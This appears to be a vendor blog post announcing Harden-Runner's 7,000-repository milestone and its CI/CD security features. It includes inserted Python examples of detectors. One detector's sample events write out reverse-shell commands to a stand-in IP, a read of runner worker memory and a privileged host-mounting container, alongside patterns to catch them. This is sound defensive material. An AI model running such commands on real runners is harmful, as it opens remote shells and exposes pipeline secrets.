
7,000 Open-Source Projects Now Secured by Harden-Runner

StepSecurity’s Harden-Runner now protects over 7,000 GitHub repositories with real-time CI/CD runtime monitoring, threat detection, and supply chain security enforcement—backed by features like impostor commit alerts, process-based detections, and GitLab support.
Eromosele Akhigbe

June 30, 2025


At StepSecurity, our mission is unwavering: make CI/CD pipelines secure by default. Today, we’re excited to announce that Harden-Runner is now protecting over 7,000 open-source repositories, barely two months after passing the 6,000 mark.

We’re now monitoring over 5 million jobs per week across workflows from community users and our enterprise customers. This reflects a growing understanding across the developer and security communities that CI/CD is the new frontier for supply chain security, and that visibility into what runs during builds is no longer optional.

Why It Matters: Harden-Runner in a Threat-Filled Landscape

The software supply chain is under siege—from mutable tags and unmaintained Actions to sophisticated exfiltration techniques embedded in trusted projects. Developers need tools that provide real-time protection without breaking workflows or slowing teams down.

Harden-Runner does exactly that. It offers runtime monitoring and enforcement for GitHub Actions, detecting suspicious behavior as it happens—often before anyone else is aware.

CI/CD Security in the Wild: Harden-Runner Detects and Defends

Our growth in open-source adoption hasn’t happened in a vacuum. It’s happened because Harden-Runner consistently delivers real-world value, often catching threats others miss.

One such example is our early detection of the tj-actions supply chain breach, which exposed a chained compromise across popular GitHub Actions. That early detection helped prevent damage for many projects.

Varun Sharma (CEO, StepSecurity) and Ashish Kurmi (CTO, StepSecurity) will be presenting the full story at Black Hat USA in their talk, “When ‘Changed Files’ Changed Everything: Uncovering and Responding to the tj-actions Supply Chain Breach.” If you’re attending, we’d love for you to stop by and chat.


Harden-Runner Detects New Traffic to release-assets.githubusercontent.com Across Multiple Customers

Harden-Runner detected unexpected outbound calls to release-assets.githubusercontent.com across multiple customers. This new domain had never appeared in workflow baselines and raised concerns of a potential platform compromise.

StepSecurity quickly correlated the activity, engaged GitHub Support, and confirmed it was a legitimate infrastructure change—not a breach. Harden-Runner baselines were immediately updated, and customers were advised to update egress rules.

What’s New: Expanded Capabilities Since 6,000 Projects

Since our last milestone blog at 6,000 projects, we've introduced several features to help teams get more from Harden-Runner:

Impostor Commit detection

We now alert you when a GitHub Action uses a tag that points to a commit that does not exist on the Action repository’s default branch. This helps you:

  • Spot potentially compromised actions
  • Audit projects with risky release practices
  • Make informed decisions about trusting such actions

👉 Learn more in this blog post
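The check described above, as an added example in Python (this is not StepSecurity’s or Harden-Runner’s code): extract the `uses:` references from a workflow, resolve each tag to a commit, and test whether that commit is reachable from the head of the Action repository’s default branch. The workflow text, repository names, tags and commit graph are constructed for the example; a real tool would fetch them with `git ls-remote --tags`, `git merge-base --is-ancestor`, or the GitHub API.

```python
"""Impostor-commit check for GitHub Actions `uses:` references.

Added example (not StepSecurity's or Harden-Runner's code). It models the
alert described above: an Action tag that resolves to a commit which is not
reachable from the Action repository's default branch. Repository data is
constructed inline; a real implementation would fetch it with
`git ls-remote --tags`, `git merge-base --is-ancestor`, or the GitHub API.
"""
import re
from typing import Dict, List, Tuple

# Constructed workflow text (hypothetical repositories and versions).
WORKFLOW = """
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: example-org/good-action@v1.2.0
      - uses: example-org/suspect-action@v2.0.1
      - uses: ./.github/actions/local-step
      - run: make test
"""

# Constructed repository snapshots: default-branch head, tag -> SHA, and the
# commit graph as child SHA -> parent SHAs. SHAs are placeholders.
REPOS: Dict[str, dict] = {
    "actions/checkout": {
        "default_head": "c1",
        "tags": {"v4": "c1"},
        "parents": {"c1": ["c0"], "c0": []},
    },
    "example-org/good-action": {
        "default_head": "g3",
        "tags": {"v1.2.0": "g2"},
        "parents": {"g3": ["g2"], "g2": ["g1"], "g1": []},
    },
    # The tag points at x9, which shares history with the repo but is not an
    # ancestor of the default-branch head (think: a commit pushed to a fork
    # or a deleted branch). That is an impostor commit.
    "example-org/suspect-action": {
        "default_head": "s2",
        "tags": {"v2.0.1": "x9"},
        "parents": {"s2": ["s1"], "s1": [], "x9": ["s1"]},
    },
}

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.MULTILINE)


def extract_uses(workflow: str) -> List[Tuple[str, str]]:
    """Return (owner/repo, ref) pairs for remote Actions.

    Local (./path) and docker:// references have no tag to check and are
    skipped; owner/repo/subdir@ref is reduced to owner/repo.
    """
    refs = []
    for match in USES_RE.finditer(workflow):
        ref = match.group(1).strip("'\"")
        if ref.startswith(("./", "docker://")) or "@" not in ref:
            continue
        path, version = ref.rsplit("@", 1)
        refs.append(("/".join(path.split("/")[:2]), version))
    return refs


def is_ancestor(parents: Dict[str, List[str]], commit: str, head: str) -> bool:
    """True if `commit` is reachable from `head` by following parent links."""
    stack, seen = [head], set()
    while stack:
        current = stack.pop()
        if current == commit:
            return True
        if current in seen:
            continue
        seen.add(current)
        stack.extend(parents.get(current, []))
    return False


def check_reference(repo: str, ref: str) -> str:
    """Classify one Action reference: ok, impostor, unknown-ref or unknown-repo."""
    snapshot = REPOS.get(repo)
    if snapshot is None:
        return "unknown-repo"
    sha = snapshot["tags"].get(ref)
    if sha is None:
        return "unknown-ref"
    if is_ancestor(snapshot["parents"], sha, snapshot["default_head"]):
        return "ok"
    return "impostor"


def audit_workflow(workflow: str) -> Dict[str, str]:
    """Map each remote `uses:` reference in the workflow to its verdict."""
    return {f"{repo}@{ref}": check_reference(repo, ref)
            for repo, ref in extract_uses(workflow)}


if __name__ == "__main__":
    for reference, verdict in audit_workflow(WORKFLOW).items():
        print(f"{verdict:12} {reference}")
```

Running the script flags `example-org/suspect-action@v2.0.1` as an impostor while the other two references pass. Note that a tag resolving to a commit that exists on a non-default branch also fails this check, which is why the alert is framed as a prompt to audit release practices rather than as proof of compromise.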

Baseline Monitoring

We introduced baseline monitoring to detect unusual outbound network activity across jobs, repositories, ARC (Actions Runner Controller) clusters, and even GitHub organizations. Each resource is assigned a Creating, Stable, or Unstable status to help teams identify anomalies faster.

👉 Learn more in the docs
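To make the release-assets.githubusercontent.com incident and the baseline statuses concrete, here is an added Python example (not Harden-Runner’s implementation) of a per-job egress baseline. It replays constructed telemetry in run order, records any host a job has never contacted before once a baseline exists, derives a Creating / Stable / Unstable status, and renders the reviewed baseline in the newline-separated `domain:port` form that Harden-Runner’s `allowed-endpoints` input takes. The minimum-run threshold, the exact status rules, the sample hosts and the assumption of port 443 are all mine, not the product’s.

```python
"""Egress baseline monitoring for CI jobs.

Added example (not Harden-Runner's implementation). It models a per-job
baseline of outbound destinations, a job status of Creating / Stable /
Unstable, and the first appearance of a never-seen host such as
release-assets.githubusercontent.com. Thresholds and status rules are
assumptions made for this example.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, Iterable, List, Set, Tuple

MIN_RUNS_FOR_BASELINE = 3  # assumption: with fewer runs a job is still "Creating"

# Constructed telemetry: (job name, run id, destination host). Run 4 of the
# build job is the first to contact release-assets.githubusercontent.com.
EVENTS: List[Tuple[str, int, str]] = [
    ("build", 1, "github.com"), ("build", 1, "api.github.com"), ("build", 1, "registry.npmjs.org"),
    ("build", 2, "github.com"), ("build", 2, "registry.npmjs.org"),
    ("build", 3, "github.com"), ("build", 3, "api.github.com"),
    ("build", 4, "github.com"), ("build", 4, "release-assets.githubusercontent.com"),
    ("lint", 1, "github.com"),
]


@dataclass
class JobBaseline:
    runs_seen: int = 0
    known_hosts: Set[str] = field(default_factory=set)
    anomalies: List[Tuple[int, str]] = field(default_factory=list)  # (run id, new host)

    @property
    def status(self) -> str:
        if self.runs_seen < MIN_RUNS_FOR_BASELINE:
            return "Creating"
        return "Unstable" if self.anomalies else "Stable"


def build_baselines(events: Iterable[Tuple[str, int, str]]) -> Dict[str, JobBaseline]:
    """Replay runs in order. Once a job has enough runs for a baseline, any host
    not seen before is recorded as an anomaly (and still added to the known set
    so it is reported once, at the run where it first appeared)."""
    hosts_by_job_run: Dict[str, Dict[int, Set[str]]] = defaultdict(lambda: defaultdict(set))
    for job, run_id, host in events:
        hosts_by_job_run[job][run_id].add(host)

    baselines: Dict[str, JobBaseline] = {}
    for job, runs in hosts_by_job_run.items():
        baseline = JobBaseline()
        for run_id in sorted(runs):
            hosts = runs[run_id]
            if baseline.runs_seen >= MIN_RUNS_FOR_BASELINE:
                for host in sorted(hosts - baseline.known_hosts):
                    baseline.anomalies.append((run_id, host))
            baseline.known_hosts |= hosts
            baseline.runs_seen += 1
        baselines[job] = baseline
    return baselines


def allowed_endpoints(baseline: JobBaseline, accept: Iterable[str] = ()) -> str:
    """Render the baseline as newline-separated `domain:port` entries, the form
    Harden-Runner's allowed-endpoints input takes. Flagged hosts are left out
    until a reviewer explicitly accepts them. Port 443 is assumed here."""
    flagged = {host for _, host in baseline.anomalies} - set(accept)
    return "\n".join(f"{host}:443" for host in sorted(baseline.known_hosts - flagged))


if __name__ == "__main__":
    baselines = build_baselines(EVENTS)
    for name, baseline in baselines.items():
        print(f"{name}: {baseline.status} anomalies={baseline.anomalies}")
    # After GitHub confirmed the new domain was legitimate, accept it:
    print(allowed_endpoints(baselines["build"],
                            accept=["release-assets.githubusercontent.com"]))
```

With this data the build job goes Unstable at run 4 because of the new domain, while the lint job has too few runs and stays Creating. Only after a reviewer passes the host to `accept` does it appear in the rendered allow-list, which mirrors the advice given to customers in the incident above: confirm first, then update egress rules.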

Process Based Detections

We’ve recently expanded our detection capabilities to include process-based signals. These detections help identify high-risk behaviors on the runner, such as:

  • Attempts to read runner worker memory
  • Execution of reverse shells
  • Launching of privileged containers

These additions enhance our ability to detect and block sophisticated attacks that go beyond network-based indicators.
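The three signals listed above, as an added Python example (not Harden-Runner’s detection logic) run over constructed process events: a reverse shell via `/dev/tcp` or netcat’s `-e`, a read of `/proc/<pid>/mem` for the Runner.Worker process (whose memory holds the job’s secrets, which is why that read matters), and a container runtime launched with `--privileged`. The event shape, PIDs, paths and command lines are all constructed, and the patterns are illustrative rather than exhaustive.

```python
"""Process-based detections on a CI runner.

Added example (not Harden-Runner's detection logic). Three rules run over
constructed process events shaped loosely like what a runner-side sensor
would emit: exec events carry argv, open events carry a path. The patterns
are assumptions for the example and are not exhaustive.
"""
import os
import re
from typing import Dict, List

# Constructed events. PID 410 is the Runner.Worker process; PID 512 is the
# shell running a job step; everything below it is the job's own activity.
EVENTS: List[Dict] = [
    {"type": "exec", "pid": 410, "ppid": 300, "argv": ["/home/runner/runners/2.3/bin/Runner.Worker"]},
    {"type": "exec", "pid": 512, "ppid": 410, "argv": ["bash", "-e", "/home/runner/work/_temp/step.sh"]},
    {"type": "exec", "pid": 513, "ppid": 512, "argv": ["npm", "ci"]},
    {"type": "exec", "pid": 600, "ppid": 512, "argv": ["bash", "-c", "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"]},
    {"type": "open", "pid": 601, "ppid": 512, "path": "/proc/410/mem"},
    {"type": "exec", "pid": 602, "ppid": 512, "argv": ["docker", "run", "--privileged", "-v", "/:/host", "alpine"]},
    {"type": "exec", "pid": 603, "ppid": 512, "argv": ["nc", "-e", "/bin/sh", "203.0.113.7", "4444"]},
    {"type": "open", "pid": 604, "ppid": 512, "path": "/proc/604/status"},
]

DEV_TCP_RE = re.compile(r"/dev/(tcp|udp)/")
PROC_MEM_RE = re.compile(r"^/proc/(\d+)/mem$")
CONTAINER_RUNTIMES = {"docker", "podman", "nerdctl"}
NETCATS = {"nc", "ncat", "netcat"}


def is_reverse_shell(argv: List[str]) -> bool:
    """A shell wiring its stdio to /dev/tcp, or netcat told to exec a program."""
    if not argv:
        return False
    if DEV_TCP_RE.search(" ".join(argv)):
        return True
    return os.path.basename(argv[0]) in NETCATS and "-e" in argv[1:]


def is_privileged_container(argv: List[str]) -> bool:
    """`docker run --privileged` and friends; build/pull/etc. are not flagged."""
    if len(argv) < 2:
        return False
    return (os.path.basename(argv[0]) in CONTAINER_RUNTIMES
            and argv[1] in {"run", "create"}
            and "--privileged" in argv)


def detect(events: List[Dict]) -> List[Dict]:
    """Return detections in event order. Worker PIDs are learned from exec
    events so that a read of /proc/<worker pid>/mem can be told apart from
    ordinary /proc access by the job's own tools."""
    worker_pids = set()
    findings: List[Dict] = []
    for ev in events:
        if ev["type"] == "exec":
            argv = ev["argv"]
            if os.path.basename(argv[0]) == "Runner.Worker":
                worker_pids.add(ev["pid"])
            elif is_reverse_shell(argv):
                findings.append({"rule": "reverse_shell", "pid": ev["pid"], "detail": " ".join(argv)})
            elif is_privileged_container(argv):
                findings.append({"rule": "privileged_container", "pid": ev["pid"], "detail": " ".join(argv)})
        elif ev["type"] == "open":
            match = PROC_MEM_RE.match(ev["path"])
            if match and int(match.group(1)) in worker_pids:
                findings.append({"rule": "worker_memory_read", "pid": ev["pid"], "detail": ev["path"]})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(f"{finding['rule']:22} pid={finding['pid']} {finding['detail']}")
```

On this input the job’s legitimate activity (`bash -e step.sh`, `npm ci`, a read of its own `/proc/<pid>/status`) produces nothing, while the four hostile events are each attributed to a rule. Tracking the worker PID rather than matching on a fixed path is what keeps the memory-read rule from firing on a process inspecting itself.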

GitLab Support

StepSecurity now supports GitLab self-hosted runners, giving GitLab users access to the same rich telemetry and policy enforcement that GitHub projects enjoy.

👉 Learn more in the docs

StepSecurity on AWS Marketplace

StepSecurity is now available on AWS Marketplace, making it easier for enterprises to procure and deploy CI/CD protections at scale.

👉 Learn more in this blog post

Project Spotlight: Harden-Runner in Action

We’re proud to support the open-source ecosystem through our Community Tier—free for all public repositories.

Thousands of projects rely on Harden-Runner for threat detection, least privilege enforcement, and runtime visibility. Here are a few recent standouts:

WasmEdge: A high-performance WebAssembly runtime. WasmEdge uses Harden-Runner to secure its CI workflows with outbound network controls and behavioral monitoring.

Explore this interactive demo to see how WasmEdge leverages Harden-Runner to secure its GitHub workflow files:

Intel’s Open-source: Several of Intel’s open-source projects are now protected, including:

These repos form the building blocks for developer tooling and UI design, and Harden-Runner helps ensure their workflows stay locked down and observable.

Explore this interactive demo to see how Intel leverages Harden-Runner to secure its GitHub workflow files:

🔒 Not Using Harden-Runner Yet?

Now is the perfect time to get started with Harden-Runner. Use Secure Workflow, free on our Community Tier, to automatically add Harden-Runner to your workflow file and protect your GitHub Actions in just a few clicks.

Let’s push CI/CD security forward—together.
